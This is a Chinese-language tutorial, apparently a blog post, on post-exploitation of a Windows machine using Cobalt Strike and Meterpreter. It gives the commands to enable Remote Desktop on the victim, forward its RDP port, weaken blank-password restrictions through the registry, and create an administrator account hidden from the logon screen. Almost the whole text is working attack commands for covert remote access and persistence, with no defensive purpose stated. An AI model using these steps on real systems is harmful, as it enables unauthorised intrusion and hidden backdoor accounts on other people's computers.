CobaltStrike默认提供的远程VNC功能几乎很难使用,在没有足够可靠的远程工具的情况下,我们可以结合meterpreter来进行端口转发,实现远程桌面的直接访问。

开启远程桌面

首先在CobaltStrike中Spawn出一个会话到meterpreter

再在meterpreter中运行getgui命令开启对象的远程桌面

创建端口转发:portfwd add -l 2222 -r 127.0.0.1 -p 3389
即将目标机器的3389端口转发到meterpreter所在机器的2222端口

接下来就可以尝试连接2222端口,但是如果目标机器没有设置密码或者我们不知道其管理员密码,那么我们是没有办法直接连接上的

处理空密码登录

方法①:尝试允许空密码登录,使用下面两条命令可以修改注册表实现允许空密码登录,修改后需要重启计算机生效,但对最新版本Windows 10似乎无效

reg add HKLM\SYSTEM\ControlSet001\Control\Lsa\ /v LimitBlankPasswordUse /d 0 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v LimitBlankPasswordUse /d 0 /f

方法②:添加隐藏账户

①添加账户
net user name password /add
net localgroup administrators tian /add

②修改注册表实现隐藏
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v tian /t REG_DWORD /d 0 /f

③删除账户
net user tian /delete